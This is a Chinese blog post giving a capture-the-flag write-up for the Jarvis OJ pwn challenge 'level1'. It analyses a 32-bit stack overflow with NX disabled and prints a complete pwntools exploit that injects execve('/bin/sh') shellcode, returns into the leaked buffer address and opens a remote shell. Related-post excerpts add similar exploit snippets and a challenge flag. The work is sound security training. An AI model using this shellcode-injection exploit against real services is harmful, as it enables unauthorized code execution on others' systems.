Jarvis OJ level1题解

最新推荐文章于 2021-12-05 22:48:23 发布
最新推荐文章于 2021-12-05 22:48:23 发布
阅读量562 收藏
点赞数 1
文章标签: pwn2own 安全漏洞
本文链接:https://blog.csdn.net/RChaos/article/details/104393344
版权

题目网址https://www.jarvisoj.com/challenges
Pwn区level1题
首先把文件放入gdb中用checksec分析
在这里插入图片描述
分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执行这个变量里面的内容。
PWN-shellcode获取与编写可以参考一下这个博客

该文件为32位的,这个可以自己丢进IDA试一下,不同位数的文件执行只能在相应位数的IDA中,丢入IDA,找到main函数,然后F5生成伪代码
在这里插入图片描述
观察后发现这个页面没有可利用的东西,然后进入function()函数
在这里插入图片描述
这时候发现了问题,read函数能允许你输入0x100(32位)数据,双击buf后观察发现buf距离返回地址只有0x88
在这里插入图片描述
所以存在了栈溢出
0x88+0x4就到达了返回地址。现在我们知道了payload的大小了
payload=shellcode+padding+bp+ret。其中shellcode+padding的大小为0x88
bp为0x4,返回地址就是buf的地址。现在需要找buf的地址了
再次回来伪代码这里
在这里插入图片描述
观察可发现printf函数获得了一次buf的地址,我们可以在这里接收buf的地址下面就附上完整的exp脚本

  1 from pwn import *#pwn工具包
  2 
  3 context.log_level = 'DEBUG'#日志,方便观察
  4 p = remote('pwn2.jarvisoj.com','9877')#远程连接
  5 #p = process(本机文件地址,如'./level1')
  6 p.recvuntil('this:')#接收到这个暂停,后面就是%p,是buf的地址
  7 buf_addr = int(p.recvuntil('?',drop=True),16)这里接收buf的地址
  8 payload = asm(shellcraft.sh()).ljust(0x88,'\x90')#这里插入shellcode,
  #这是pwn工具包自带的shellcode制作函数shellcraft.sh(),后面的ljust自行百度
  #用asm转换成汇编代码
  9 payload += 'a'*4 + p32(buf_addr)#payload=shellcode+padding+bp+ret
 10 print p32(buf_addr)#p32是因为这是32位的文件,把buf_addr的内容转换成32位的包
 11 print p.send(payload)
 12 #两次的print是为了方便观察
 13 p.interactive()#与终端互动
 #成功后即可使用ls查看文件,发现有一个flag文件,然后使用cat flag打开文件得到flag

感谢借鉴,欢迎各位评论纠正或者问问题。
在这里插入图片描述

thecat0r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jarvis OJ level1
Kni9hT's Blog
11-08 587
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
Jarvis OJ--level3
Kni9hT's Blog
11-10 249
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
jarvisoj_level1
、moddemod
07-06 380
这题我写这个exp是在ubuntu18的环境下写的,远程和本地的IO交互的数据不太一样,下面的exp在远程可以拿到shell,本地可能需要修改一下… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level1' p = process(proc_name) # p = remote('node3.buuoj.cn', 29850) elf = ELF(proc_na.
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 861
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
Jarvis OJ level1
九层台
07-06 773
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 299
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
笔记向——PWN jarvis oj level1
m0_52133692的博客
12-07 130
题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5 nc pwn2.jarvisoj.com 9877 0x01Linux中分析题目 首先使用file命令,文件为32位 再运行一下文件,提示输入,然后输出hello world 若出现权限不够则使用 chmod 777 文件名 ,打开文件所有权限 使用gdb工具,终端输入gdb,再输入:checksec 文件名,检查保
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj-level1
qq_35661990的博客
11-08 294
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 163
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
Jarvis OJlevel1
weixin_43464124的博客
04-22 270
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 419
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1581
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 357
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 784
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
jarvis oj---level1解题方法
weixin_45427676的博客
09-29 475
题目场景 nc pwn2.jarvisoj.com 9877 level1.80eacdcd51aca92af7749d96efad7fb5 解题 在vm终端“checksec"查看一下保护机制 没有什么保护,用IDA打开文件 查看vulnerable_function()函数 可以看到栈溢出 我们没有看到system()函数,没有找到"/bin/sh",但是在vulnerable_funct...
Jarvis oj level1 wp
ditto的博客
12-30 302
看下防护 啥也没开。 放IDA里看下: 很显然,利用泄露的数组的首地址来写通解,就不用管ASLR了。 exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9877") a.recvuntil("What's this:") addr=a.recvuntil(&
Jarvis OJ level1 writeup
PLpa的博客
07-07 688
拿到题目,首先我们检查一下程序的保护: 可以看出来,程序什么保护也没开,既然没开NX保护,说明堆栈上的代码可以执行。 我们打开IDA反汇编一下: 我们看到这里可输入一个buf,并且题目把buf的地址也输出到屏幕上,我们就可以控制buf植入shell code了,再返回调用即可。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值